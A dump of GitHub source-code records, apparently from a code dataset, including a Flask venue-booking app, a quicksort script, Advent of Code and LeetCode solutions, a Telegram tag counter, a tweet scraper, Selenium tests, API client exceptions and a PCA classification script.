case-insensitive.\n # search for \"A\" should return \"Guns N Petals\", \"Matt Quevado\", and \"The Wild Sax Band\".\n # search for \"band\" should return \"The Wild Sax Band\".\n # done.\n response = {}\n search_term = request.form.get('search_term', '')\n artists = Artist.query.filter(Artist.name.ilike(\"%\" + search_term + \"%\")).all()\n data = []\n for artist in artists:\n data.append( {\"id\": artist.id, \n 'name': artist.name, \n 'num_upcoming_shows': len( db.session.query(Show).filter(Show.start_time > datetime.now(), Show.artist_id == artist.id).all() )} )\n response['count'] = len(data)\n response['data'] = data\n return render_template('pages/search_artists.html', results=response, search_term=search_term)\n\n@app.route('/artists/<int:artist_id>')\ndef show_artist(artist_id):\n # shows the artist page with the given artist_id\n # TODO: replace with real artist data from the artist table, using artist_id\n # done.\n data = {} \n artist = Artist.query.get(artist_id)\n genres = artist.genres.replace('{', '').replace('}', '').split(',')\n data = {\"id\": artist.id,\n \"name\": artist.name,\n \"genres\": genres,\n \"city\": artist.city,\n \"state\": artist.state,\n \"phone\": artist.phone,\n \"website\": artist.website_link,\n \"facebook_link\": artist.facebook_link,\n \"seeking_venue\": artist.seeking_venue,\n \"seeking_description\": artist.seeking_description,\n \"image_link\": artist.image_link,\n \"past_shows\": [],\n \"upcoming_shows\": [],\n \"past_shows_count\": 0,\n \"upcoming_shows_count\": 0,\n }\n \n # past shows\n past_shows_list = []\n past_shows_db = Show.query.filter(Show.start_time < datetime.now(), Show.artist_id == artist_id).all()\n for show in past_shows_db:\n venue = Venue.query.get(show.venue_id)\n past_shows_list.append( {'venue_id': show.venue_id, 'venue_name': venue.name, 'venue_image_link': venue.image_link 
,'start_time': show.start_time} )\n # future shows\n future_shows_list = []\n future_shows_db = Show.query.filter(Show.start_time >= datetime.now(), Show.artist_id == artist_id).all()\n for show in future_shows_db:\n venue = Venue.query.get(show.venue_id)\n future_shows_list.append( {'venue_id': show.venue_id, 'venue_name': venue.name, 'venue_image_link': venue.image_link ,'start_time': show.start_time} ) \n data['past_shows'] = past_shows_list\n data['upcoming_shows'] = future_shows_list\n data['past_shows_count'] = len(past_shows_list)\n data['upcoming_shows_count'] = len(future_shows_list)\n return render_template('pages/show_artist.html', artist=data)\n\n# Update\n# ----------------------------------------------------------------\n@app.route('/artists/<int:artist_id>/edit', methods=['GET'])\ndef edit_artist(artist_id):\n # TODO: populate form with fields from artist with ID <artist_id>\n # done.\n data = Artist.query.get(artist_id)\n artist={\n \"id\": data.id,\n \"name\": data.name,\n \"genres\": data.genres.replace('{', '').replace('}', '').split(','),\n \"city\": data.city,\n \"state\": data.state,\n \"phone\": data.phone,\n \"website\": data.website_link,\n \"facebook_link\": data.facebook_link,\n \"seeking_venue\": data.seeking_venue,\n \"seeking_description\": data.seeking_description,\n \"image_link\": data.image_link\n }\n form = ArtistForm(name=data.name,\n city=data.city,\n state=data.state,\n phone=data.phone,\n facebook_link=data.facebook_link,\n website_link=data.website_link,\n image_link=data.image_link,\n seeking_venue=data.seeking_venue,\n seeking_description=data.seeking_description)\n return render_template('forms/edit_artist.html', form=form, artist=artist)\n\n@app.route('/artists/<int:artist_id>/edit', methods=['POST'])\ndef edit_artist_submission(artist_id):\n # TODO: take values from the form submitted, and update existing\n # artist record with ID <artist_id> using the new attributes\n # done.\n try:\n artist = Artist.query.get(artist_id)\n artist.name = request.form['name']\n artist.city =request.form['city']\n artist.state = request.form['state']\n artist.phone = request.form['phone']\n artist.image_link = request.form['image_link']\n artist.facebook_link = request.form['facebook_link']\n artist.genres = request.form.getlist('genres')\n artist.website_link = request.form['website_link']\n artist.seeking_venue = request.form.get('seeking_venue') == 'y'\n artist.seeking_description = request.form['seeking_description']\n db.session.commit() \n # on successful db insert, flash success\n flash('Artist ' + str(artist_id) + ' was successfully updated!')\n except:\n db.session.rollback()\n flash('An error occurred. 
Artist ' + str(artist_id) + ' could not be updated.')\n finally:\n db.session.close()\n return redirect(url_for('show_artist', artist_id=artist_id))\n\n@app.route('/venues/<int:venue_id>/edit', methods=['GET'])\ndef edit_venue(venue_id):\n # TODO: populate form with values from venue with ID <venue_id>\n # done.\n data = Venue.query.get(venue_id)\n venue={\n \"id\": data.id,\n \"name\": data.name,\n \"genres\": data.genres.replace('{', '').replace('}', '').split(','),\n \"address\": data.address,\n \"city\": data.city,\n \"state\": data.state,\n \"phone\": data.phone,\n \"website\": data.website_link,\n \"facebook_link\": data.facebook_link,\n \"seeking_talent\": data.seeking_talent,\n \"seeking_description\": data.seeking_description,\n \"image_link\": data.image_link\n }\n form = VenueForm( name=data.name,\n city=data.city,\n state=data.state,\n address=data.address,\n phone=data.phone,\n facebook_link=data.facebook_link,\n website_link=data.website_link,\n image_link=data.image_link,\n seeking_talent=data.seeking_talent,\n seeking_description=data.seeking_description)\n return render_template('forms/edit_venue.html', form=form, venue=venue)\n\n@app.route('/venues/<int:venue_id>/edit', methods=['POST'])\ndef edit_venue_submission(venue_id):\n # TODO: take values from the form submitted, and update existing\n # venue record with ID <venue_id> using the new attributes\n # done.\n try:\n venue = Venue.query.get(venue_id)\n venue.name = request.form['name']\n venue.city =request.form['city']\n venue.state = request.form['state']\n venue.address = request.form['address']\n venue.phone = request.form['phone']\n venue.image_link = request.form['image_link']\n venue.facebook_link = request.form['facebook_link']\n venue.genres = request.form.getlist('genres')\n venue.website_link = request.form['website_link']\n venue.seeking_talent = request.form.get('seeking_talent') == 'y'\n venue.seeking_description = request.form['seeking_description']\n db.session.commit() \n # on successful db insert, flash success\n flash('Venue ' + str(venue_id) + ' was successfully updated!')\n except:\n db.session.rollback()\n flash('An error occurred. Venue ' + str(venue_id) + ' could not be updated.')\n finally:\n db.session.close()\n return redirect(url_for('show_venue', venue_id=venue_id))\n\n# Create Artist\n# ----------------------------------------------------------------\n\n@app.route('/artists/create', methods=['GET'])\ndef create_artist_form():\n form = ArtistForm()\n return render_template('forms/new_artist.html', form=form)\n\n@app.route('/artists/create', methods=['POST'])\ndef create_artist_submission():\n # called upon submitting the new artist listing form\n # TODO: insert form data as a new Artist record in the db, instead\n # TODO: modify data to be the data object returned from db insertion\n\n try: \n artist = Artist(name = request.form['name'],\n city = request.form['city'],\n state = request.form['state'],\n phone = request.form['phone'],\n image_link = request.form['image_link'],\n facebook_link = request.form['facebook_link'],\n genres = request.form.getlist('genres'),\n website_link = request.form['website_link'],\n seeking_venue = request.form.get('seeking_venue') == 'y',\n seeking_description = request.form['seeking_description'] )\n db.session.add(artist)\n db.session.commit() \n # # on successful db insert, flash success\n flash('Artist ' + request.form['name'] + ' was successfully listed!')\n except:\n db.session.rollback()\n flash('An error occurred. 
Artist ' + request.form['name'] + ' could not be listed.')\n finally:\n db.session.close()\n return render_template('pages/home.html')\n\n\n# Shows\n# ----------------------------------------------------------------\n\n@app.route('/shows')\ndef shows():\n # displays list of shows at /shows\n # TODO: replace with real venues data.\n # done.\n raw_shows = Show.query.all()\n data = []\n for show in raw_shows:\n artist = Artist.query.get(show.artist_id)\n venue = Venue.query.get(show.venue_id)\n data.append( {\"venue_id\": show.venue_id,\n \"venue_name\": venue.name,\n \"artist_id\": show.artist_id,\n \"artist_name\": artist.name,\n \"artist_image_link\": artist.image_link,\n \"start_time\": show.start_time} )\n return render_template('pages/shows.html', shows=data)\n\n@app.route('/shows/create')\ndef create_shows():\n # renders form. do not touch.\n form = ShowForm()\n return render_template('forms/new_show.html', form=form)\n\n@app.route('/shows/create', methods=['POST'])\ndef create_show_submission():\n # called to create new shows in the db, upon submitting new show listing form\n # TODO: insert form data as a new Show record in the db, instead\n # done.\n try:\n show = Show( artist_id = request.form['artist_id'], \n venue_id = request.form['venue_id'], \n start_time = request.form['start_time'] )\n db.session.add(show)\n db.session.commit() \n # on successful db insert, flash success\n flash('Show was successfully listed!')\n except:\n db.session.rollback()\n flash('An error occurred. Show could not be listed.')\n finally:\n db.session.close()\n return render_template('pages/home.html')\n\n@app.errorhandler(404)\ndef not_found_error(error):\n return render_template('errors/404.html'), 404\n\n@app.errorhandler(500)\ndef server_error(error):\n return render_template('errors/500.html'), 500\n\n\nif not app.debug:\n file_handler = FileHandler('error.log')\n file_handler.setFormatter(\n Formatter('%(asctime)s %(levelname)s: %(message)s [in %(pathname)s:%(lineno)d]')\n )\n app.logger.setLevel(logging.INFO)\n file_handler.setLevel(logging.INFO)\n app.logger.addHandler(file_handler)\n app.logger.info('errors')\n\n#----------------------------------------------------------------------------#\n# Launch.\n#----------------------------------------------------------------------------#\n\n# Default port:\nif __name__ == '__main__':\n app.run()\n\n# Or specify port manually:\n'''\nif __name__ == '__main__':\n port = int(os.environ.get('PORT', 5000))\n app.run(host='0.0.0.0', port=port)\n'''\n","repo_name":"jinjin-liang/nd0044-project1-Fyyur","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":22381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"70965189165","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Aug 11 22:36:45 2018\n\n@author: Das\n\"\"\"\n\ndef Quicksort(arr, l, r):\n if l < r:\n pi = partition(arr, l, r)\n \n arr = Quicksort(arr, l, pi-1)\n arr = Quicksort(arr, pi+1, r)\n return arr\n \ndef partition(a, l, r):\n p = a[r]\n i = l-1\n \n for j in range(l, r):\n if a[j] <= p:\n i+=1\n a[i], a[j] = a[j], a[i]\n a[i+1], a[r] = a[r], a[i+1]\n return i+1\n \n\nprint('Enter numbers to sort separated by space:')\niput = input()\n\na = iput.split()\na = list(map(int, a))\na = Quicksort(a, 0, len(a)-1)\n\nprint(list(range(0, 6)))","repo_name":"dasaprakashk/100daysofcode","sub_path":"Divide and 
Conquer/Sorting/QuickSort.py","file_name":"QuickSort.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"19104980147","text":"f = open('day2-input.txt','r')\nlines = f.readlines()\nlines = [line.rstrip() for line in lines]\n\nsum = 0\nfor line in lines:\n line = list(line.split(' '))\n if(line[1] == 'Y'): \n sum += 3\n if(line[0] == 'A'): #Rock\n sum += 1\n elif(line[0] == 'B'): #Paper\n sum += 2\n else: #scissors\n sum += 3\n elif(line[1] == 'X'): \n sum += 0\n if(line[0] == 'A'): #Rock\n sum += 3\n elif(line[0] == 'B'): #Paper\n sum += 1\n else: #scissors\n sum += 2\n else: \n sum += 6\n if(line[0] == 'A'): #Rock\n sum += 2\n elif(line[0] == 'B'): #Paper\n sum += 3\n else: #scissors\n sum += 1\n\nprint(sum)\n\nf.close()","repo_name":"bergenmarshall/AdventOfCode2022","sub_path":"day2.py","file_name":"day2.py","file_ext":"py","file_size_in_byte":824,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"2405774954","text":"from Carro import Carro\r\n\r\ncarro1 = Carro(\"Fiat\",\"Strada\",\"2020\",0)\r\n\r\ncarro1.ligar()\r\n\r\n# carro1.acelerar(int(input(\"Enter how much to accelerate: \")))\r\n\r\n# if carro1.verificarMarcha() == False:\r\n# print(\"Slow down\")\r\n# else:\r\n# print(\"The car is in gear\", carro1.verificarMarcha())\r\n\r\nif carro1.acelerar(int(input(\"Enter how much to accelerate: \"))):\r\n print(\"Accelerated\")\r\nelse:\r\n print(\"Did not accelerate\")\r\n ","repo_name":"leoncosta1980/AulasInfinity","sub_path":"Aula 12_06/mainCarro.py","file_name":"mainCarro.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"73197787244","text":"import asyncio\nimport csv\nimport logging\nimport re\nfrom datetime import datetime\nfrom pathlib import Path\n\nfrom telethon import TelegramClient # type: ignore\n\nfrom common import TAG_PATTERN, SESSION_NAME, SYSTEM_VERSION\n\n_log = logging.getLogger(__name__)\n\n\ndef get_tags(channel_name: str,\n api_id: int,\n api_hash: str,\n ):\n client = TelegramClient(SESSION_NAME, api_id, api_hash, system_version=SYSTEM_VERSION)\n client.start()\n\n tags: dict = {}\n\n async def main():\n channel = await client.get_entity(channel_name)\n messages = await client.get_messages(channel, limit=None)\n for msg in messages:\n if msg.text:\n _log.debug(msg.text)\n matches = re.findall(TAG_PATTERN, msg.text)\n for tag in matches:\n tags[tag] = tags.get(tag, 0) + 1\n\n loop = asyncio.get_event_loop()\n loop.run_until_complete(main())\n\n if not tags:\n _log.warning(\"No tags collected, csv will not be created\")\n return\n\n _log.debug(tags)\n write_csv(tags)\n\n\ndef write_csv(tags: dict):\n fieldnames = [\"Tag\", \"Amount\"]\n timestamp = datetime.now().strftime(\"%d_%m_%Y__%H_%M_%S\")\n here = Path(__file__).parents[2].resolve()\n output_folder = here / 'output' / 'tags'\n tags_file = output_folder / f\"{timestamp}_tags.csv\"\n output_folder.mkdir(exist_ok=True, parents=True)\n\n with open(tags_file, 'w', newline='') as csv_file:\n writer = csv.DictWriter(csv_file, fieldnames=fieldnames)\n writer.writeheader()\n for tag in tags:\n writer.writerow({fieldnames[0]: tag, fieldnames[1]: 
tags[tag]})\n","repo_name":"Cimeta/parser-example","sub_path":"src/parser/tags.py","file_name":"tags.py","file_ext":"py","file_size_in_byte":1670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"30017438594","text":"# -*- coding: utf-8 -*-\n\"\"\"\n##################################################\n#\n# ECP 3004: Python for Business Analytics\n#\n# Name: Songjie Yin\n#\n# Date: 5/3/2021\n# \n##################################################\n#\n# Sample Script for Final Exam: \n# Module with Function Definitions\n#\n##################################################\n\"\"\"\n\n\n\n\"\"\"\n##################################################\n##################################################\n# Note: there should be no printing or calculations\n# in this script, aside from function definitions. \n# Save those for a script that you might call\n# my_midterm_tests.py (but is not graded).\n##################################################\n##################################################\n\"\"\"\n\n\n\n\n\n\n##################################################\n# Import Required Modules\n##################################################\n\n# import name_of_module\nimport math\nimport numpy as np\nfrom scipy.optimize import minimize\n\n##################################################\n# Function Definitions\n##################################################\n\n# Only function definitions here - no other calculations. \n\n# Exercise 1\n\ndef ln_check(x: float, a: float) -> float:\n \"\"\"\n \n Calculates the difference between math.log(x) \n\tand some candidate value a, which is a guess of the value of math.log(x).\n \n >>> ln_check(math.exp(7), 3)\n 4.0\n >>> ln_check(math.exp(9), 4.5)\n 4.5\n >>> ln_check(math.exp(10), 10)\n 0.0\n \n \"\"\"\n ln = math.log(x)\n \n check = ln - a\n \n return check\n\n# Exercise 2\n\ndef calc_e(x_0: float, max_iter: int, tol: float) -> float:\n \"\"\"\n Preconditions: x_0, max_iter, tol > 0\n \n Calculates the base of the natural logarithm.\n \n >>> calc_e(2, 10, 0.001)\n 2.718281064358138\n >>> calc_e(5,20, 0.001)\n 2.718281828458728\n >>> calc_e(1, 10, 0.1)\n 2.718281064358138\n \n \"\"\"\n x = x_0\n for i in range(max_iter):\n x_next = x-x*ln_check(x, 1)\n if abs(x_next-x) < tol:\n break\n x = x_next\n return x_next\n\n# Exercise 3\n\ndef SSR_conc(beta_1: float, y: np.ndarray, x: np.ndarray) -> float:\n \"\"\"\n Calculates the sum of squared residuals \n for the linear regression model,\n as a function of the slope coefficient only, \n concentrating out the intercept.\n \n \n >>> SSR_conc(1.0, [3, -3, 3], [1, 1, 1])\n 24.0\n >>> SSR_conc(1.0, [3, 0, 3], [0, 2, 2])\n 12.666666666666666\n >>> SSR_conc(0.5, [2, 3, 4], [1, 2, 3])\n 0.5\n \n \"\"\"\n \n y_bar = sum(y)/len(y)\n x_bar = sum(x)/len(x)\n \n beta_0 = y_bar - (x_bar * beta_1)\n \n ssr = sum((np.array(y) - beta_0 - beta_1*np.array(x))**2)\n \n return ssr\n\n# Exercise 4\n\ndef ols_slope_conc(y: np.ndarray, x: np.ndarray) -> float:\n \"\"\"\n Calculates the estimated slope coefficient \n for the linear regression model,\n by minimizing the concentrated sum of squared residuals, \n which concentrates out the intercept.\n \n >>> ols_slope_conc([2, 1, 2], [1, 0, 1])\n 1.0\n >>> ols_slope_conc([3, 4, 5], [5, 4, 3])\n -1.00000001888464\n >>> ols_slope_conc([2, 1, 0], [1, 1, 0])\n 1.500000003725291\n \n \"\"\"\n \n initial_beta_1 = 1.0\n return minimize(SSR_conc, initial_beta_1, args=(y, x)).x[0]\n\n# Only function definitions above this point. 
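\n\n# Sanity check: the numerical minimizer in ols_slope_conc should approximate the\n# closed-form OLS slope, sum((x - x_bar)*(y - y_bar)) / sum((x - x_bar)**2).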
\n\n\n##################################################\n# Test the examples in your docstrings\n##################################################\n\n\n# Question 2: Test using the doctest module. \n\n\n# Make sure to include examples in your docstrings above\n# with the proper formatting. \n\n# Test all functions with three examples each. \n# One example is already provided. \n\n# Choose good examples that will test interesting cases. \n# Make sure they all work correctly. \n\n\n# Add code so that the tests are implemented below \n# -- but only when the script is run,\n# not when it is imported. \n\nimport doctest\n\nif __name__ == \"__main__\":\n\n    doctest.testmod()\n\n\n\n##################################################\n# End\n##################################################\n\n","repo_name":"Kelvin0123/SongjieYin-ECP3004S21","sub_path":"final_exam/my_final_module.py","file_name":"my_final_module.py","file_ext":"py","file_size_in_byte":4138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"30655579223","text":"import unittest\n\nfrom rca.programmes.utils import format_study_mode\n\n\nclass TestFormatStudyMode(unittest.TestCase):\n    def test_common_last_word(self):\n        study_modes = [\n            \"Full-time study\",\n            \"Part-time study\",\n        ]\n        result = format_study_mode(study_modes)\n        self.assertEqual(result, \"Full-time or part-time study\")\n\n    def test_different_last_word(self):\n        study_modes_list = [\n            [\n                \"Study online\",\n                \"Study on campus\",\n            ],\n            [\n                \"Full-time\",\n                \"Part-time\",\n            ],\n        ]\n        result1 = format_study_mode(study_modes_list[0])\n        self.assertEqual(result1, \"Study online or study on campus\")\n\n        result2 = format_study_mode(study_modes_list[1])\n        self.assertEqual(result2, \"Full-time or part-time\")\n\n    def test_custom_separator(self):\n        study_modes = [\n            \"Option A\",\n            \"Option B\",\n            \"Option C\",\n        ]\n        result = format_study_mode(study_modes, separator=\" / \")\n        self.assertEqual(result, \"Option a / option b / option c\")\n","repo_name":"torchbox/rca-wagtail-2019","sub_path":"rca/programmes/tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"19"} +{"seq_id":"74083843882","text":"from panda3d.core import Vec4, Point3\n\nELEVATOR_NORMAL = 0\nELEVATOR_INT = 1\nREJECT_NOREASON = 0\nREJECT_SHUFFLE = 1\nREJECT_NOSEAT = 2\nMAX_GROUP_BOARDING_TIME = 6.0\n\nElevatorData = {ELEVATOR_NORMAL: {'openTime': 2.0,\n                   'closeTime': 2.0,\n                   'width': 3.5,\n                   'countdown': 15.0,\n                   'sfxVolume': 1.0,\n                   'collRadius': 5},\n                ELEVATOR_INT: {'openTime': 2.0,\n                   'closeTime': 2.0,\n                   'width': 3.5,\n                   'countdown': 65.0,\n                   'sfxVolume': 1.0,\n                   'collRadius': 5}}\n\nTOON_BOARD_ELEVATOR_TIME = 1.0\nTOON_EXIT_ELEVATOR_TIME = 1.0\nTOON_VICTORY_EXIT_TIME = 1.0\nSUIT_HOLD_ELEVATOR_TIME = 1.0\nSUIT_LEAVE_ELEVATOR_TIME = 2.0\nINTERIOR_ELEVATOR_COUNTDOWN_TIME = 90\nLIGHT_OFF_COLOR = Vec4(0.5, 0.5, 0.5, 1.0)\nLIGHT_ON_COLOR = Vec4(1.0, 1.0, 1.0, 1.0)\n\nElevatorPoints = [Point3(-1.5, 5, 0.1), Point3(1.5, 5, 0.1),\n                  Point3(-2.5, 3, 0.1), Point3(2.5, 3, 0.1)]\n\nElevatorOutPoints = [Point3(-1.5, -5, 0), Point3(1.5, -5, 0),\n                     Point3(-2.5, -7, 0), Point3(2.5, -7, 0)]\n\nElevatorOutPointsFar = [Point3(-1.5, -5, 0), Point3(1.5, -5, 0),\n                        Point3(-2.5, -7, 
0)]\n","repo_name":"Cog-Invasion-Online/cio-src","sub_path":"game/src/coginvasion/cogoffice/ElevatorConstants.py","file_name":"ElevatorConstants.py","file_ext":"py","file_size_in_byte":1451,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"19"} +{"seq_id":"14331276561","text":"class Solution:\n def addBinary(self, a: str, b: str) -> str:\n i = -1\n total = \"\"\n carry = 0\n diff = len(a) - len(b)\n\n if diff > 0:\n b = diff * \"0\" + b\n elif diff < 0:\n a = abs(diff) * \"0\" + a\n\n while abs(i) <= len(a):\n if int(a[i]) + int(b[i]) + carry < 2:\n total = str(int(a[i]) + int(b[i]) + carry) + total\n carry = 0\n elif int(a[i]) + int(b[i]) + carry == 2:\n carry = 1\n total = \"0\" + total\n else:\n carry = 1\n total = \"1\" + total\n i -= 1\n\n if carry:\n total.replace(total[0], \"0\")\n total = \"1\" + total\n\n return total\n","repo_name":"ocan00cemal/LeetCode","sub_path":"67. Add Binary.py","file_name":"67. Add Binary.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"1676480912","text":"import unittest\nfrom selenium import webdriver\nimport xlutils\nfrom xlutilis import ReadData\nfrom selenium.webdriver.common.keys import Keys\nclass Test_001(unittest.TestCase):\n @classmethod\n def setUp(self):\n self.driver=webdriver.Chrome(executable_path=\"C:\\\\Users\\\\DELL\\\\AppData\\\\Local\\\\Programs\\\\Python\\\\Python37\\\\chromedriver.exe\")\n @classmethod\n def tearDown(self):\n self.driver.close()\n\n def test_login_facebook(self):\n self.driver.get(\"https://www.facebook.com/login/\")\n self.driver.find_element_by_xpath(\"//*[@id='email']\").send_keys(\"mskmouni@gmail.com\")\n self.driver.find_element_by_xpath(\"//*[@id='pass']\").send_keys(\"cdsdcdsd\")\n self.driver.find_element_by_xpath(\"//*[@id='loginbutton']\").click()\n title_fb=self.driver.title\n self.assertEqual(\"test_login_facebook\",title_fb,\"title of the page is unmatched\")\n @unittest.skip(\"this is the test not ready yet\")\n def test_redbus(self):\n self.driver.get(\"https://www.redbus.in/\")\n print(self.driver.title)\n @unittest.SkipTest\n def test_opencart(self):\n self.driver.get(\"https://www.opencart.com/\")\n return self.driver.title\n\nif \"__name__\" == \"__main__\":\n unittest.main\n","repo_name":"surmetta143/pythonProject","sub_path":"Test_unit.py","file_name":"Test_unit.py","file_ext":"py","file_size_in_byte":1238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"37749171168","text":"import calendar\nimport datetime\nfrom selenium import webdriver\nfrom selenium.webdriver.support import expected_conditions as EC\nimport time\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.common.by import By\n\ndef getXpath(browser,tweet):\n # use JavaScript execute the code getting XPath\n xpath = browser.execute_script(\"\"\"\n function absoluteXPath(element) {\n var comp, comps = [];\n var parent = null;\n var xpath = '';\n var getPos = function(element) {\n var position = 1, curNode;\n if (element.nodeType == Node.ATTRIBUTE_NODE) {\n return null;\n }\n for (curNode = element.previousSibling; curNode; curNode = curNode.previousSibling) {\n if (curNode.nodeName == element.nodeName) {\n ++position;\n }\n }\n return position;\n };\n while (element) {\n comp = comps[comps.length] = {};\n switch (element.nodeType) {\n case Node.TEXT_NODE:\n comp.name = 'text()';\n break;\n case 
Node.ATTRIBUTE_NODE:\n            comp.name = '@' + element.nodeName;\n            break;\n            default:\n            comp.name = element.nodeName;\n        }\n        comp.position = getPos(element);\n        element = element.parentNode;\n        }\n        for (var i = comps.length - 1; i >= 0; i--) {\n        comp = comps[i];\n        xpath += '/' + comp.name;\n        if (comp.position !== null) {\n            xpath += '[' + comp.position + ']';\n        }\n        }\n        return xpath;\n    }\n    return absoluteXPath(arguments[0]);\n    \"\"\", tweet)\n    return xpath\n\ndef splitTime(sinceTime,untilTime):\n    #split untilTime-sinceTime by month\n    dates = []\n    for year in range(sinceTime.year, untilTime.year + 1):\n        for month in range(1, 13):\n            first_day = datetime.datetime(year, month, 1)\n            last_day = calendar.monthrange(year, month)[1]\n            dates.append(first_day)\n            dates.append(datetime.datetime(year, month, last_day))\n    s = dates[0::2]\n    e = dates[1::2]\n    sinceList = [str(date).split()[0] for date in s]\n    untilList = [str(date).split()[0] for date in e]\n    return sinceList,untilList\n\ndef scrap(browser,advSearchComand):\n    key='[data-testid=\"tweetText\"]'#locating the tweets\n    wait = WebDriverWait(browser, 10)\n    browser.get(advSearchComand)\n    WebDriverWait(browser, 10).until(EC.element_to_be_clickable((By.CSS_SELECTOR, key)))\n    collect=[]\n    tweets = wait.until(EC.presence_of_all_elements_located((By.CSS_SELECTOR, key)))\n    while tweets:\n        for tweet in tweets:\n            if len(getXpath(browser,tweet))>=210:# filter out reposted tweets; reposts have a longer xpath\n                continue\n            collect.append(tweet.text)\n        browser.execute_script(\"arguments[0].scrollIntoView({ behavior: 'auto', block: 'start' });\", tweet)# jump to the last tweet\n        time.sleep(5)\n        tempTweets = wait.until(EC.presence_of_all_elements_located((By.CSS_SELECTOR, key)))\n        tweets=tempTweets[tempTweets.index(tweet)+1:]\n    return collect","repo_name":"Jing-XING/TweetCrawler","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"71846888684","text":"from typing import Dict, List, Any\nfrom requests import HTTPError, Response\nfrom urllib.parse import urlparse, parse_qs\nfrom functools import reduce\n\n\nclass CoinMetricsUnauthorizedException(HTTPError):\n    \"\"\"\n    Raised when a request is made that will return an error due to being unauthorized to flat files server\n    \"\"\"\n\n    def __init__(self, response: Response, *args: Any, **kwargs: Any):\n        if response.status_code not in [401, 403]:\n            response.raise_for_status()\n        self.response = response\n        self.request = response.request\n        error_message = \"\"\"The provided API key is not authorized to access the Coin Metrics Flat Files server. This product is separate from the API. 
If you'd like access granted or believe this is a mistake please contact Coin Metrics support.\n        \"\"\"\n        self.msg = error_message\n        super().__init__(response=response, request=response.request, *args, **kwargs)\n\n    def __str__(self) -> str:\n        return self.msg\n\n\nclass CoinMetricsClientQueryParamsException(HTTPError):\n    \"\"\"\n    Raised when a request is made that will return an error due to the logic or contents of the request\n    \"\"\"\n\n    def __init__(self, response: Response, *args: Any, **kwargs: Any):\n        if response.status_code != 414:\n            response.raise_for_status()\n        parsed_query_params: Dict[str, List[str]] = parse_qs(\n            str(urlparse(url=response.request.url).query)\n        )\n        get_sum_of_lengths = lambda strings: reduce(lambda a, b: a + len(b), strings, 0)\n        param_length_dict = {\"Total characters\": 0}\n        for param, values in parsed_query_params.items():\n            sum_of_param_lengths = get_sum_of_lengths(values)\n            param_length_dict[param] = sum_of_param_lengths\n            param_length_dict[\"Total characters\"] += sum_of_param_lengths\n        exception_message = (\n            \"This request failed because the request URL is too long, consider reducing the length \"\n            f\"of the params.\\n 414 errors may get returned as total characters in query params exceed 5000\"\n            f\"\\nLength of the params provided for reference:\\n {param_length_dict}\"\n        )\n        self.msg = exception_message\n        super().__init__(*args, **kwargs)\n\n    def __str__(self) -> str:\n        return self.msg\n","repo_name":"coinmetrics/api-client-python","sub_path":"coinmetrics/_exceptions.py","file_name":"_exceptions.py","file_ext":"py","file_size_in_byte":2328,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"19"} +{"seq_id":"70217545644","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Mar  6 10:29:46 2018\r\n\r\n@author: YUBO\r\n\"\"\"\r\nimport pandas as pd\r\nimport matplotlib\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport scipy as sp\r\nimport sklearn\r\nfrom pandas import Series,DataFrame\r\nfrom sklearn.cross_validation import train_test_split\r\nfrom sklearn.metrics import confusion_matrix\r\nfrom sklearn.ensemble import ExtraTreesClassifier, RandomForestClassifier,AdaBoostClassifier,GradientBoostingClassifier\r\nfrom sklearn.linear_model import LogisticRegression\r\nfrom mlxtend.classifier import StackingCVClassifier\r\nfrom collections import Counter\r\nfrom sklearn.decomposition import PCA\r\nnp.random.seed(0)\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom sklearn.model_selection import GridSearchCV\r\n# read the test set\r\ntest_data=pd.read_csv(\"all_test.csv\",header=None)\r\ntest_data=test_data.iloc[0:99998,:]\r\nerror=pd.read_csv(\"error.csv\",header=None)\r\ntest_data=test_data.append(error,ignore_index=True)\r\ntest_data1=test_data.iloc[:,1:]\r\ntest_data1.columns=list(np.arange(2600))\r\n\r\n\r\ndata_train=pd.read_csv(\"partTrainData.csv\",header=None)\r\nmix_data=data_train.iloc[:,0:2600].append(test_data1,ignore_index=True)\r\nmix_data=DataFrame(mix_data)\r\nscale = StandardScaler()\r\nx = scale.fit_transform(mix_data)# standardize the data\r\nx=DataFrame(x)\r\npca = PCA(n_components=50)\r\nx_pca_new=pca.fit_transform(x)# project the data onto the principal components to get component scores\r\nx_pca_new=DataFrame(x_pca_new)\r\ntest11=x_pca_new.iloc[48383:,:]\r\ntrain11=x_pca_new.iloc[0:48383,:]\r\ntrain11.loc[:,\"class\"]=data_train.iloc[:,2600]\r\ntrain11_train,train11_test=train_test_split(train11,test_size=0.3)\r\n# parameter tuning\r\nresults1 = []\r\n\r\n
